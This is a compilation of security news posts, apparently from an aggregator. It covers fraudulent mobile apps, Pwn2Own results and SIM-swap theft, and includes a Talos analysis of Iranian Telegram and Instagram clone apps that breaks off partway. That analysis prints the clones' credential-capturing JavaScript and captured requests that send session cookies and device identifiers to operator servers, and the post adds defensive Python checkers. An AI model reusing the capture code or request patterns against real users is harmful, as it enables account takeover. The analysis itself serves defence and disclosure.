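As an added defender-side illustration (this is example code, not anything from ESET or Security Affairs), the Python below triages an Android manifest for the permission mix the report attributes to the Game Center payload (network access, network and Wi-Fi state, running at startup) combined with the ability to install packages, which is what a downloader needs. The permission and intent names are real Android identifiers; the risk weights, the review threshold and the two sample manifests are this example’s own assumptions.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
ANAME = "{%s}name" % ANDROID_NS  # ElementTree's form of the android:name attribute

# Real Android permission identifiers; the weights are this example's own assumption.
# INTERNET, ACCESS_NETWORK_STATE and ACCESS_WIFI_STATE are the "full network access"
# and "view network and Wi-Fi connections" permissions the report attributes to Game
# Center; RECEIVE_BOOT_COMPLETED is "run at startup"; REQUEST_INSTALL_PACKAGES lets an
# app hand a downloaded APK to the system installer, i.e. the downloader step.
RISK_WEIGHTS = {
    "android.permission.INTERNET": 1,
    "android.permission.ACCESS_NETWORK_STATE": 1,
    "android.permission.ACCESS_WIFI_STATE": 1,
    "android.permission.RECEIVE_BOOT_COMPLETED": 2,
    "android.permission.REQUEST_INSTALL_PACKAGES": 3,
}
REVIEW_THRESHOLD = 5  # assumed cut-off: at or above this, hold the app for manual review


def parse_manifest(xml_text):
    """Extract package name, declared permissions and launcher presence from a manifest."""
    root = ET.fromstring(xml_text)
    perms = {p.get(ANAME) for p in root.iter("uses-permission")}
    has_launcher = False
    for intent in root.iter("intent-filter"):
        actions = {a.get(ANAME) for a in intent.iter("action")}
        categories = {c.get(ANAME) for c in intent.iter("category")}
        if ("android.intent.action.MAIN" in actions
                and "android.intent.category.LAUNCHER" in categories):
            has_launcher = True
    return {"package": root.get("package"), "permissions": perms,
            "has_launcher": has_launcher}


def triage(manifest):
    """Score a parsed manifest and decide whether it matches the downloader pattern."""
    score, findings = 0, []
    for perm in sorted(manifest["permissions"]):
        weight = RISK_WEIGHTS.get(perm, 0)
        if weight:
            score += weight
            findings.append(perm.rsplit(".", 1)[-1])
    # The report's apps hide their icon at runtime, which no manifest check can see;
    # an APK with no launcher entry at all still deserves a note, because the user
    # has no visible way to find and remove it.
    if not manifest["has_launcher"]:
        score += 2
        findings.append("NO_LAUNCHER_ACTIVITY")
    # Autostart plus the ability to install packages is the core downloader
    # combination, so it is flagged regardless of the total score.
    downloader_combo = {
        "android.permission.RECEIVE_BOOT_COMPLETED",
        "android.permission.REQUEST_INSTALL_PACKAGES",
    } <= manifest["permissions"]
    return {"package": manifest["package"], "score": score, "findings": findings,
            "flag": downloader_combo or score >= REVIEW_THRESHOLD}


# Constructed sample manifests for the demo; neither is taken from a real app.
BENIGN_GAME = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.puzzlegame">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
  <application>
    <activity android:name=".MainActivity">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity>
  </application>
</manifest>"""

DOWNLOADER_GAME = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.racinggame">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
  <uses-permission android:name="android.permission.ACCESS_WIFI_STATE"/>
  <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
  <uses-permission android:name="android.permission.REQUEST_INSTALL_PACKAGES"/>
  <application>
    <activity android:name=".MainActivity">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity>
    <receiver android:name=".BootReceiver">
      <intent-filter>
        <action android:name="android.intent.action.BOOT_COMPLETED"/>
      </intent-filter>
    </receiver>
  </application>
</manifest>"""

if __name__ == "__main__":
    for xml in (BENIGN_GAME, DOWNLOADER_GAME):
        print(triage(parse_manifest(xml)))
```

The benign game scores 2 and passes; the downloader-style manifest scores 8 and is flagged both by score and by the autostart-plus-install combination, which is the signal worth acting on in an MDM or app-vetting pipeline.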

Pierluigi Paganini

(Security Affairs – Google Play, malicious apps)

The post 13 fraudulent apps into Google Play have been downloaded 560,000+ times appeared first on Security Affairs.



13 Malware-Laden Fake Apps on Google Play

A security researcher used Twitter to warn users about malware embedded in fake apps available on Google Play. Lukas Stefanko, malware researcher at ESET, reported the malicious apps to

The post 13 Malware-Laden Fake Apps on Google Play appeared first on The Cyber Security Place.

Malvertising in Apple Pay Targets iPhone Users

The Media Trust has discovered a recent malvertising campaign involving Apple Pay that is part of a large-scale phishing and redirect campaign targeting iPhone users visiting premium newspapers and magazines.

The post Malvertising in Apple Pay Targets iPhone Users appeared first on The Cyber Security Place.

Major SMS Leak Exposed Millions Of Messages

Two-factor authentication codes were also exposed in Voxox leak. A huge database with user names, smartphone numbers, SMS messages and even two-factor authentication codes has been exposed, putting personal details at

The post Major SMS Leak Exposed Millions Of Messages appeared first on The Cyber Security Place.

BYOD Posing Major Mobile Security Risks

More and more organisations are allowing employees to bring their own devices for work. More than four in five organisations allow their employees to bring their own devices (BYOD) to

The post BYOD Posing Major Mobile Security Risks appeared first on The Cyber Security Place.

Pwn2Own Tokyo 2018 – iPhone X exploits paid over $100,000

The Zero Day Initiative’s Pwn2Own Tokyo 2018 was a success: participants earned over $300,000 for disclosing flaws affecting iPhone X, Xiaomi Mi 6 and Samsung Galaxy S9 smartphones.

During the first day of the Pwn2Own Tokyo 2018 contest, participants hacked Apple iPhone X, Samsung Galaxy S9 and Xiaomi Mi 6 devices earning more than $225,000.

The novelty for this Pwn2Own edition was the creation of a specific session for IoT devices.

On the second day, the organizers only paid $100,000 for one iPhone and two Xiaomi hacks.

The day began with the success of the Team Fluoroacetate composed of Amat Cama and Richard Zhu, who hacked an iPhone X exploiting a Just-In-Time (JIT) bug and an out-of-bounds access flaw.

The team received $50,000 for exfiltrating data from the device: they successfully retrieved a previously deleted photo from the targeted phone.

Team Fluoroacetate failed to demonstrate a baseband exploit targeting the iPhone X within the allotted time, but the experts successfully exploited an integer overflow in the JavaScript engine of the Xiaomi web browser to exfiltrate a picture from the phone.

They earned $25,000 USD and 6 Master of Pwn points.

F-Secure’s MWR Labs (Georgi Geshev, Fabi Beterke, and Rob Miller) also failed to hack the iPhone X in the browser category; they were not able to get their exploit chain working within the allotted time.

Later, MWR Labs hacked the Xiaomi Mi 6 in the browser category, using a download bug along with a silent app installation to load their custom app and exfiltrate pictures.

They earned another $25,000 USD and 6 more Master of Pwn points.

The organizers reported the flaws to their respective vendors. In total they paid out $325,000 for 18 zero-days, $110,000 of which was for iPhone X exploits.

The flaws could be used by a persistent attacker or a surveillance firm to compromise the target device via its browser or Wi-Fi; their value in the cybercrime underground is much greater than the prizes paid.

“Overall, we awarded $325,000 USD total over the two day contest purchasing 18 0-day exploits. Onsite vendors have received the details of these bugs and now have 90 days to produce security patches to address the bugs we reported. Once these are made public, stay tuned to this blog for more details about some of the best and most interesting bugs we saw this week.” concludes the official page for the Pwn2Own Tokyo 2018.

Pierluigi Paganini

(Security Affairs – Pwn2Own Tokyo 2018, hacking)

The post Pwn2Own Tokyo 2018 – iPhone X exploits paid over $100,000 appeared first on Security Affairs.

Beers with Talos Ep. #41: Sex, money and malware



Beers with Talos (BWT) Podcast Ep. #41 is now available. Download this episode and subscribe to Beers with Talos via iTunes or Google Play.

Ep. #41 show notes: 

Recorded Nov. 9, 2018 — We tried to make this episode last week, but thanks to some technical difficulties, we ended up calling that one a practice run. Here is take two, focused on recent sextortion scams and the pending machine learning apocalypse. We also review why vulnerability discovery and red teams are the most important line items in your security budget by looking at a recent story where a breach cost dozens of lives.

The topics

00:38 — Roundtable: We are now trivia-worthy
12:25 — Persian Stalker and on down the mobile rabbit hole
22:45 — The anatomy of sextortion scams
31:32 — Machine learning and the malware wars
45:20 — Vulnerability discovery: Why our 200-vuln milestone is both important and amazing
52:32 — Save the red team, CIA covert comms cover blown
1:02:49 — Closing thoughts and parting shots

Featuring: Craig Williams (@Security_Craig), Joel Esler (@JoelEsler), Matt Olney (@kpyke) and Nigel Houghton (@EnglishLFC).
Hosted by Mitch Neff (@MitchNeff).

How to Stop Mobile Apps That Steal

Smartphones are motivating targets for cybercriminals. Mobile devices today hold personal and monetizable data such as login credentials, financial information and company secrets — not to mention spy-friendly sensors such as microphones, cameras and location electronics.

Unsavory actors gain access to phones through breaches, physical access to the device or, increasingly, by hiding code in mobile apps that “phones home” and sends target data back to the perpetrator. This method is especially attractive for criminals because users are in control of app installations and physically carry phones right inside company firewalls.

How to Recognize App Fraud

Malicious exfiltration often originates in fraudulent apps. The Slovakian cybersecurity company ESET recently discovered six fake banking apps on the Google Play store, according to Reuters. The developers spoofed banking apps from financial institutions across multiple countries and stole credit card details and login credentials.

Trustlook Labs also discovered an Android Trojan hidden inside an app called Cloud Module, which obfuscates its existence to evade detection. The app stealthily steals data from mobile messaging apps, including Facebook Messenger, Twitter, Viber and Skype.

Fraudulent apps are often found in legitimate app stores, but an entire fraudulent app store recently emerged, according to Talos Intelligence. Called Google Play Market, the app was designed to mimic the actual Google Play Store. It tries to trick users into granting it administrator privileges and access to settings, passwords and contacts.

Second-Guess the Popular Mobile Apps

According to GuardianApp, researchers discovered a series of legitimate and even popular apps extracting data. The No. 1 mapping app for finding gas prices, which claims 70 million users, and the No. 2 weather app were among the apps that contained the exfiltration code.

At least two dozen of these iOS apps were sharing location data (GPS, Wi-Fi and Bluetooth location) with companies that sell location information without the knowledge or permission of users. Some apps also shared other data, including browser histories, accelerometer data, cellular network name, GPS altitude and speed, and other data.

The firms selling the data are reportedly paying developers to install code that collects information, which they often say is used in an aggregated and anonymized form for market research services. To the app developers, it’s a way to monetize their apps. Many of these apps have even explicitly said location data will not be shared.

Understand the Threat

Far too often, these apps escape scrutiny because they sound so harmless, but it could be dangerous to underestimate their damage. Let’s say, for example, that an exfiltration app harvests only anonymized location data. What could be the harm in that?

A popular app could be used by dozens, hundreds or even thousands of users within one organization. By analyzing the location data, it would be easy to discover that some number of victims work at a specific company, because many of them spend their days in the company building.

All those users could fall victim to phishing attacks designed to target employees of that company. Further, those anonymous users at that company could be scrutinized based on where they live, which employees spend time together, what their hobbies are, whether they have children, where they shop and other data, based purely on where they go and when.

When personal information is used to construct victim profiles, phishing attacks can be far more effective. For example, let’s say 20 people at a company are found to be the parents of kids at a specific school. Scammers could blast the entire company email roster with an urgent message that sounds personalized because it specifically mentions both the company and the school, and maybe even the principal of the school. Although a generic phishing attack will likely have a relatively low success rate, a small number of those parents are sure to be duped, if only for a second. But that’s all it takes; once clicked, the payload is delivered and the damage begins.

Why You Should Invest in UEM and User Education

Although all of the malicious apps mentioned above have been removed from their app stores, as with most security threats, they were discovered only long after the damage was done. Two key actions are required to head off future risk from exfiltration apps.

First, adopt a unified endpoint management (UEM) solution that leverages artificial intelligence to spot anomalous and potentially malicious patterns. This should provide a safety net when human judgment fails.

Next, educate employees on how to spot apps that may contain exfiltration code to get ahead of human error. Data thieves are counting on user ignorance. In your training, be sure to include the following mobile security tips:

  • Discourage anyone in the organization from installing obscure apps, since they are more likely to escape app store scrutiny.
  • Avoid apps that are highly rated but have a small number of downloads, since fake accounts and bots can be used to inflate ratings.
  • Fake apps often have similar logos to the ones they’re imitating, but can contain typos in the descriptions and other telltale signs.
  • Always check the “Details” under app permissions before installation to see what permissions will be requested.
  • User agreements can sometimes reveal nefarious intent. If the end user license agreement (EULA) for a flashlight app asserts the right to use location and other irrelevant data, be suspicious.
  • Finally, do a search on the web for the name of the app you intend to download to see what other users and organizations are saying about it.

The arms race between threat actors and enterprise security professionals will continue, and it’s an uneven playing field. A malicious actor only needs to find one innovative way inside the organization. A security professional needs to guard against all possible attacks.

We can’t know exactly where the next attack will come from — but we do know that smartphone apps are among the best ways to smuggle payloads into an organization. As these threats proliferate, organizations will need to learn how to recognize app fraud on the fly and proactively defend against malicious applications to keep their data, employees and customers safe.

The post How to Stop Mobile Apps That Steal appeared first on Security Intelligence.

Smashing Security #103: An Instagram nightmare, crazy iPhone deaths, and election hack claims

One travel blogger finds you don’t have to be Kylie Jenner to be targeted by an Instagram hacker. When 40 iPhones at a hospital mysteriously die, what could be the explanation? And, surprise surprise, political parties in the USA are throwing around hacking accusations.

All this and much more is discussed in the latest edition of the award-winning “Smashing Security” podcast by computer security veterans Graham Cluley and Carole Theriault, joined this week by Naked Security’s Mark Stockley.

The risk of using phone numbers as authenticators for sensitive information

Large companies are exposed to vulnerabilities that can cause serious financial losses – and some of these vulnerabilities come from apparently secure procedures. This has been highlighted by a recent lawsuit against AT&T for the theft of a total of 24 million dollars from one of the company’s clients, the cryptocurrency investor, Michael Terpin. Far from carrying out a highly complex attack that got through the firewalls and security barriers in the cryptocurrency platform or the telecommunications company, the attackers used an extremely simple attack vector: the victim’s phone number.

SIM cards are vulnerable

Terpin is basing his lawsuit on the responsibility the provider has for the double attack that he suffered: the first of the attacks used a SIM swap hack that gave the attacker access to his phone, and thus to all his applications for online services. In this context, SIM cards are essential in two-factor authentication (2FA) processes. In theory, there can’t be two SIM cards with the same number at the same time; as such, the authentication of an online account using a phone number is an apparently secure process: the owner of the account receives the tokens – that is, the access codes for the online account – generally via SMS, straight to their mobile.

However, there are times when the SIM card may not be under the control of its owner, for example when the card has been lost or physically disabled. At this moment, the data can be transferred to a device belonging to someone else, who has usurped the real owner, whether intentionally or by mistake. According to the lawsuit, after the first SIM swap hack, an AT&T employee must have shared with an attacker one of the tokens received by Terpin on his phone to reactivate the SIM card.

This is how the second attack would have taken place: the attacker, after gaining control of the SIM and, as such, all of Terpin’s online accounts with 2FA, was able to access the cryptocurrency platform and in this way, extract his money. Terpin believes that the provider is negligent, both for the employee complicit in the theft, and for not cancelling the connection between his data and the SIM quickly enough to get ahead of the attacker.

In any case, he is not the first victim of this kind of attack, since 2FA is one of the most commonly used procedures in large companies for their online services. For this reason, many experts have cast doubt on the security of 2FA via mobile phones.

Given that users are entirely in the hands of their own devices and of the security measures of the telecoms operator, if this authentication is the only control measure, it can also be dangerous for large companies. This is especially true if employees use corporate mobiles that give them access to sensitive company information. As we mentioned in a previous blog post, directors are the largest risk for a company’s mobile security, and if, in addition, it is a large company, the losses stemming from an attack could run into millions.

Size matters

While it may sound surprising, it is large companies (not SMEs) that act worst when faced with cyberattacks and vulnerabilities. This is what the data in the Penetration Risk Report, written by the cybersecurity advisor Coalfire, shows.

The study shows that of the vulnerabilities found in large companies, 49% were deemed high risk, compared to 38% in SMEs. Among the most common vulnerabilities mentioned in the study were insecure protocols. This last case includes the security risks related to corporate mobile phones, such as SIM swap hacking, as happened to Terpin.

How can large companies minimize their mobile security risks?

As SMS-based 2FA has been shown to be insufficient, employees should use authentication apps for their corporate devices. These apps generate temporary 6-digit tokens linked to chosen accounts, which are automatically regenerated every 30 seconds, thus significantly reducing the options for attackers to take control of apps and services, even if they have managed to take over the SIM.

Another key measure for improving mobile security is to protect the corporate network itself: heads of security must provide workers with encrypted connections so that employees can securely access corporate systems remotely, using virtual private networks (VPNs).

Finally, it is vital that large companies have advanced cybersecurity solutions that offer detailed visibility of all the activity on endpoints, total control of all running processes and a reduction of the attack surface. Having a partner like Panda for Key Accounts is a guarantee of avoiding risks. We are allies of Key Accounts, with a department dedicated exclusively to providing support and specific solutions, as well as creating security strategies for companies with over 5,000 workstations. We focus on what is most important: our strategy is aimed at protecting the endpoint, where all the employees’ and the company’s critical information is stored. In this way, we manage to keep any kind of attack, no matter how complex it may seem, from endangering companies.

The post The risk of using phone numbers as authenticators for sensitive information appeared first on Panda Security Mediacenter.

Persian Stalker pillages Iranian users of Instagram and Telegram

This blog post is authored by Danny Adamatis, Warren Mercer, Paul Rascagneres, Vitor Ventura and with the contributions of Eric Kuhla.

Introduction

State-sponsored actors have a number of different techniques at their disposal to remotely gain access to social media and secure messaging applications. Starting in 2017 and continuing through 2018, Cisco Talos has seen different techniques being used to attack users and steal their private information. These techniques used fake login pages, malicious apps disguised as their legitimate counterparts and BGP hijacking, and were specifically targeting Iranian users of the secure messaging app Telegram and the social media site Instagram.

Telegram has become a popular target for greyware in Iran, as the app is used by an estimated 40 million users. While it's mostly used for daily communication, protest organizers also used it in the past to organize demonstrations against the Iranian government, specifically in December 2017. In a few instances, the Iranian government asked Telegram to shut down certain channels for "promoting violence." The tactics outlined in this post have been in use since 2017 in an effort to gather information about Telegram and Instagram users. The campaigns vary in complexity, resource needs and methods. Below, we outline examples of a network attack, application clones and classic phishing. It is our belief that these campaigns were used to specifically target Iranian users of the Telegram app in an effort to steal personal and login information.
Once installed, some of these Telegram "clones" have access to the mobile device's full contact list and messages, even if the user is also using the legitimate Telegram app. In the case of phony Instagram apps, the malicious software sends full session data back to backend servers, which allows the attacker to take full control of the account in use. We declare with high confidence that these apps should be classified as "greyware": not malicious enough to be classified as malware, but suspicious enough to be considered a potentially unwanted program (PUP). This kind of software is difficult to detect, as it typically performs the functions the user expects of it (e.g., sending messages). The only time this kind of software is detected by security researchers is when it has an impact somewhere else. Talos eventually discovered several pieces of software that have the potential to be used in far-reaching campaigns. We believe this greyware has the potential to reduce the privacy and security of mobile users who use these apps. Our research revealed that some of these applications send data back to a host server, or are controlled in some way from IP addresses located in Iran, even if the devices are located outside the country.

Another method we saw in the Iranian attacks was the creation of fake login pages. Even though this isn't an advanced technique, it is effective against users who aren't as aware of cybersecurity as they should be. Iran-connected groups like "Charming Kitten" have been using this technique for a while to target secure messaging apps. Some actors are also hijacking BGP routes. This technique redirects traffic at the router level, without the receiving routers verifying the origin of the new routes. In order to hijack BGP, there needs to be some sort of cooperation from an internet service provider (ISP), and the hijack is easily detectable, so the new routes won't be in place for very long.

Talos hasn't found a solid connection between the several attacks we've observed, but all of them target Iran, its nationals and the Telegram app. Although this post focuses on Iran, mobile users across the globe still need to be aware that these techniques could be used by any threat actor in any country, state-sponsored or not. This is especially prevalent in countries like Iran and Russia, where apps like Telegram are banned, and developers create clones that appear on official and unofficial app stores to replicate Telegram's services.

A regular user can't do anything about BGP hijacking, but using legitimate applications from the official application stores reduces the risk. The same rule applies to the cloned applications: installing applications from untrusted sources implies a certain degree of risk that users must be aware of. In both situations, this risk is substantially increased when the applications are unofficial "enhanced functionality" applications, even when they are available on the official Google Play store.

Tactics

Functionality enhancement applications (grey)

Andromedaa.ir and Cambridge Universal Academy

Description of andromedaa.ir

Talos identified a software developer completely focused on the Iranian market. The publisher goes by the name "andromedaa.ir" on both iOS and Android platforms. It develops software intended to increase users' exposure on social media networks, like Instagram, as well as the number of Iranian users on certain Telegram channels.

While looking at the website, and more specifically the installation links, it is clear that none of these applications are published in the official application stores (Google or Apple), which is likely due to sanctions put in place against Iran by the U.S. government.

Whois information for andromedaa.ir

The andromedaa.ir domain is registered with the h0mayun@outlook.com email address. This is the same email address used to register other domains for the cloned Instagram and Telegram applications (see other sections below).

Talos identified various domains after analysing the whois information associated with the domain andromedaa[.]com, all but one registered with the same phone number.

A partial list of the domains found

We scanned the IP address associated with the aforementioned domains, which revealed a pattern in their use of SSL certificates.

Certificate information

This SSL certificate analysis revealed an additional domain — flbgr[.]com — whose whois information was privacy protected. Based on the low prevalence of those values in the SSL certificate, Talos associates this domain with the same threat actor with high confidence. The domain flbgr[.]com was registered on Aug. 6, 2018, making it the most recently registered domain, and resolved to the IP address 145.239.65[.]25. Cisco Farsight data showed other domains also resolve to that same IP address.

List of domains associated with the same IP address

Talos then discovered an SSL certificate with a common name of followerbegir[.]ir that had a sha256 fingerprint. We also found another certificate that was very similar in nature. However, there appeared to be two typos: one in the common name field "followbeg.ir," and another in the organization field where it's identified as "andromeda," instead of andromedaa.


Certificate information

Description of Cambridge Universal Academy

Andromedaa.ir published the iOS application, but it's signed with a developer certificate issued to Cambridge Universal Academy Ltd. This is an England and Wales-registered company that offers iOS development services. This same company is owned by an Iranian citizen who owns at least four other companies in four different countries: England, U.S., Turkey and Estonia. All of those companies share the same services, offering a web page similar in content.



Google flagged the URL mohajer.co.uk for phishing, which might be related to the fact that this site, along with Mohajer.eu, are offering visa services for the U.K., U.S., Canada, Australia and other countries in the European Economic Area.

Business model


All of the andromedaa.ir applications are meant to increase users' exposure on Instagram or Telegram by increasing the likes, comments, followers or even the number of users in a specific Telegram channel. All this comes with the guarantee that only Iranian users will perform such actions. The same operator also manages (see previous section) sites like lik3.org, which sells the same kind of exposure.

Price list (original HTML errors were kept, translation by google.com)

While these services are not illegal, they definitely are "grey" services. On the same site, we can see marketing that highlights the benefits of using this service rather than others.

Lik3.org marketing (translation by google.com)

It's worth noting that the operators state that they will never ask for the customer's password for Instagram and that all of the site's users are real. The reality is that the operator doesn't need the customer's password for Instagram because an Instagram user doesn't need to log into that user's account to "like" their post.

Instead, the operator has access to thousands of user sessions. They have access to all users that have installed the "free" applications, meaning they can do whatever they want during those sessions. While the operator uses a different method for the Telegram applications, those can also lead to complete session takeover. See the "Application examples" section for more details.

The danger here is not that this operator can make money, it's that users' privacy is at risk. The same methods applied to control Instagram and Telegram accounts give the operator access to the user's full contact list, future messages on Telegram, and the user's full Instagram profile. Iran banned the usage of these sites, especially Telegram, since chats can be encrypted, locking out government access. By using these methods, the operator could compromise the endpoint and access all future chats.

Although most of the backend is hosted in Europe, all the tested applications perform an update check against a server located in Iran. Again, this is not malicious per se, but given the context of forbidden applications, this potentially gives the government a single point of access to thousands of mobile devices. However, Talos cannot establish a direct relationship between this operator and any government entity, Iranian or otherwise.

Application examples

Follower Begir Instagram iOS application

The first application we analyzed was فالوئر بگیر اینستاگرام ("Follower Begir Instagram") designed for iOS. Andromedaa.ir published this application, and it's signed by Cambridge Universal Academy. This application is an overlay to Instagram.

First screen after logging in

The developer added some features such as virtual currency and Persian language support, among others.

Certificate information

The application uses the iOS WebKit framework in order to display web content, which in this case displays the Instagram page. Upon the first execution, the application displays the Instagram login page injected with the following JavaScript snippet.

document.addEventListener('click', function () {
    // On every click, read the username and password fields of the Instagram
    // login form that the WebKit view is displaying.
    try {
        var tu = document.querySelector('[name="username"]');
        var tp = document.querySelector('[name="password"]');
        var tpV = (typeof tp == 'undefined') ? '' : tp.value;
        var tuV = (typeof tu == 'undefined') ? '' : tu.value;
    } catch (err) {
        var tuV = '';
        var tpV = '';
    }
    // Also capture the full visible text of the page.
    var bd = document.getElementsByTagName('body')[0].innerText;
    var messageToPost = {
        'pu': tuV,
        'pp': tpV,
        'bd': bd
    };
    // Hand the captured values to the native app through its WebKit message handler.
    window.webkit.messageHandlers.buttonClicked.postMessage(messageToPost);
}, false);


The purpose of this code is to hand control to the iOS application when the user clicks the "Connection" button. The application receives an event with the values of the username and password fields, along with the body of the page. The event is handled by the followerbegir.AuthorizationUserController userController:didReceiveScriptMessage() function. Afterward, the application authenticates on Instagram servers.

During this investigation, we discovered that the password was not directly sent to the backend server (v1[.]flbgr[.]com). Here is the data sent to the ping.php web page:

POST /users/ping.php?m=ios&access=[redacted]&apk=35&imei=[redacted]&user_details=[redacted]&tokenNumber=[redacted] HTTP/1.1
Host: v1.flbgr.com
SESSIONID: [redacted]
HEADER: vf1
IOS: 3361ba9ec3480bcd3766e07cf6b4068a
Connection: close
Accept: */*
Accept-Language: fr-fr
User-Agent: %D9%81%D8%A7%D9%84%D9%88%D8%A6%D8%B1%20%D8%A8%DA%AF%D9%8A%D8%B1%20%D8%A7%DB%8C%D9%86%D8%B3%D8%AA%D8%A7%DA%AF%D8%B1%D8%A7%D9%85/35 CFNetwork/893.14.2 Darwin/17.3.0
Accept-Encoding: gzip, deflate
Content-Length: 0

The operator of the backend server receives the mobile type (iOS), token and user data, such as username, profile picture and full name, if the account is private.

The SESSIONID variable contains the most sensitive information: the header of an Instagram connection with the valid cookie. The owner of the server can hijack the Instagram session of the user with the information available in this field.
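As an added example (not Talos's tooling or the app's code), here is a small Python checker that parses a captured request of this shape and flags session material leaving for a host other than Instagram, the kind of rule a mobile proxy or network sensor could apply. The sample request is constructed from the one above with the [redacted] values kept, and the Instagram host allowlist is an assumption for the demo.

```python
from urllib.parse import parse_qs, urlsplit

# Constructed sample: the ping.php request shape described in the write-up,
# with sensitive values left as the same [redacted] placeholders.
SAMPLE_REQUEST = (
    "POST /users/ping.php?m=ios&access=[redacted]&apk=35&imei=[redacted]"
    "&user_details=[redacted]&tokenNumber=[redacted] HTTP/1.1\r\n"
    "Host: v1.flbgr.com\r\n"
    "SESSIONID: [redacted]\r\n"
    "HEADER: vf1\r\n"
    "IOS: 3361ba9ec3480bcd3766e07cf6b4068a\r\n"
    "Connection: close\r\n"
    "Content-Length: 0\r\n"
    "\r\n"
)

# Assumed allowlist: hosts an Instagram client may legitimately send its session to.
INSTAGRAM_HOSTS = {"instagram.com", "www.instagram.com", "i.instagram.com"}

# Header names and query parameters that carry session or device identity.
SESSION_HEADERS = {"sessionid", "cookie", "authorization"}
IDENTITY_PARAMS = {"imei", "access", "tokennumber", "user_details"}


def parse_request(raw: str) -> dict:
    """Split a raw HTTP/1.1 request into method, path, query, headers and body.
    Header names and query keys are lower-cased so matching is case-insensitive."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    parts = urlsplit(target)
    query = {k.lower(): v for k, v in parse_qs(parts.query).items()}
    return {"method": method, "path": parts.path, "query": query,
            "headers": headers, "body": body}


def session_exfil_findings(req: dict, allowed_hosts=INSTAGRAM_HOSTS) -> list:
    """Return one finding per session header or identity parameter that is being
    sent to a host outside the allowlist; an empty list means nothing to report."""
    host = req["headers"].get("host", "").split(":")[0].lower()
    if host in allowed_hosts:
        return []
    findings = []
    for name in sorted(SESSION_HEADERS & set(req["headers"])):
        findings.append(f"{name} header sent to third-party host {host}")
    for name in sorted(IDENTITY_PARAMS & set(req["query"])):
        findings.append(f"{name} query parameter sent to third-party host {host}")
    return findings


if __name__ == "__main__":
    for finding in session_exfil_findings(parse_request(SAMPLE_REQUEST)):
        print("ALERT:", finding)
```

The check keys on where the session goes rather than on the app's name, so it also catches a repackaged clone under a new label; the cost is that a legitimate first-party host missing from the allowlist will produce a false positive, so the allowlist needs maintaining.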

The application has an update mechanism, which is based out of Iran, unlike the majority of the infrastructure. When the application starts, it sends a request to ndrm[.]ir with the current version of the app:

POST /start/fl.php?apk=35&m=ios HTTP/1.1 
Host: ndrm.ir 
HEADER: vf1 
Connection: close 
IOS: 3361ba9ec3480bcd3766e07cf6b4068a 
Accept: */* 
User-Agent: %D9%81%D8%A7%D9%84%D9%88%D8%A6%D8%B1%20%D8%A8%DA%AF%D9%8A%D8%B1%20%D8%A7%DB%8C%D9%86%D8%B3%D8%AA%D8%A7%DA%AF%D8%B1%D8%A7%D9%85/35 CFNetwork/893.14.2 Darwin/17.3.0 
Accept-Language: en-gb 
Accept-Encoding: gzip, deflate 
Content-Length: 0

If the version is not up to date, the application redirects the user to the andromedaa store:

Instructions to trust the developer certificate

The store contains the new version of the application and a procedure to trust the previously mentioned developer certificate. This allows the developers to update both the certificate trust and the application at any point in time.

Ozvbegir(ozvdarozv) application

The Ozvbegir application's intent is to increase the number of members of the user's Telegram channel. This app guarantees that these will only be Iranian users.

Application description (translation by Google Translate)

We analyzed the Android version of the application. The application package is signed by a self-signed certificate that's valid until the year 3014.

Most recent Ozvbegir certificate

Previous versions of the same application also used a self-signed certificate, but both the issuer and the subject information was clearly false.

Older version's certificate

Just like the previous application, the Ozvbegir application is repackaged and includes original classes from the Telegram application.

Ozvbegir classes structure

In fact, we found signs in the manifest that this package was actually the original Telegram package, which was changed to accommodate the application code. The names and labels used in the manifest have several references to the original Telegram application, and even the API key used for Android Maps was kept the same.


Update check and reply

Just like the previous application, this one also checks for new versions by performing an HTTP request to the ndrm.ir domain. If the application is not the latest version, it receives both a message and link to obtain the most recent version, which can be anything the operator wants. In this case, it's from cafebazaar.ir, an Iranian Android application store.

The domain ndrm.ir is registered under the same email address as all the other application-supporting domains. However, this is the only one that is actually hosted in Iran and, coincidentally, it is the one with the ability to upgrade the application on mobile devices.

The application has a look and feel that strongly resembles the original Telegram application. Just like the original Telegram application, the user is requested to provide their phone number to register in Telegram when they first open the app.


Phone number request

This registration creates a shadow session for the same device, giving the application access to the full contact list and future messages.


Sessions created on a single phone

The application contacts the backend server when the registration process is finished, supplying information about the user and the mobile device.

GET /users/ping.php?access_hash=[redacted]&inactive=0&flags=1107&last_name=%21%21empty%21%21&phone=[redacted]&tg_id=[redacted]&m=d&user_name=[redacted]&first_name=Pr2&network=SYMA&country=[redacted]&apk=570&imei=[redacted]&brand=motorola&api=24&version=7.0&model=Moto+G+%285%29&tut=[redacted] HTTP/1.1 
TOKEN: ab1ccf8fd77606dda6bb5ecc858faae1 
NUM: df27340104277f1e73142224d9cb59e8 
HEADER: bt6 
ADMIN: web 
Host: v1.ozvdarozv.com 
Connection: close 
User-Agent: Apache-HttpClient/4.5.1 (java 1.4)


We identified more than 1 million subscribers on the Telegram channel who automatically joined when they first opened the application.


Channel information


Bitgram_dev

Bitgram_dev, unlike the previous developers, does not have a large internet footprint. Currently, it has two published applications — AseGram and BitGram — on Google Play. The applications were available from the beginning of September to the beginning of October and were downloaded almost 10,000 times.

AseGram and BitGram on Google Play

Publisher information

Given that AseGram and BitGram aim to circumvent the ban that Iran put on Telegram, it's reasonable to think that the publishers would want to have a small footprint as a self-preservation measure.

Application examples



AseGram



The AseGram application is available on the Google Play store for certain countries. Even though the application was downloaded from the Google Play store, the certificate signing the package is completely useless security-wise.

AseGram certificate

This Telegram clone was clearly created to intercept all communications from the user. However, this one takes a different approach than the others: This software uses a proxy defined at the Telegram package layer in order to intercept traffic.

Set proxy code


